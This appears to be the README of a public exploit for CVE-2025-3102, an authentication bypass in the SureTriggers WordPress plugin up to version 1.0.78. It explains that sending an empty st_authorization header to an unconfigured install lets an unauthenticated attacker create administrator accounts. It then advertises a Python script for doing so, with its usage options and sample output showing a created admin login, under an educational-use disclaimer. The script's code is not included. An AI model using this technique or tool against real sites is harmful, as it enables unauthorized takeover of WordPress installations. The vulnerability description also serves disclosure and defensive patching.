
Wordpress SureTriggers <= 1.0.78 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Administrative User Creation
🚨 CVE-2025-3102 is a critical authentication bypass vulnerability affecting the SureTriggers: All-in-One Automation Platform WordPress plugin, which is actively installed on over 100,000 websites. Due to the nature of the flaw and the scale of deployment, this vulnerability poses a significant security risk.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HThe SureTriggers plugin for WordPress is vulnerable to an authentication bypass that allows unauthenticated attackers to create administrator accounts. This is due to a missing empty value check on the secret_key inside the autheticate_user function.
When the plugin is installed and activated but not configured with an API key, attackers can bypass authentication by sending an empty st_authorization header, triggering actions reserved for authenticated users.
A Python script is provided to automate exploitation of this vulnerability.
This script allows you to generate a new admin user on vulnerable sites.
readme.txtst_authorization headerusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
This script is provided for educational purposes only.
Unauthorized use of this code against targets without explicit permission is illegal.
The author assumes no liability for any misuse or damage caused.
By: Nxploited ( Khaled Alenazi )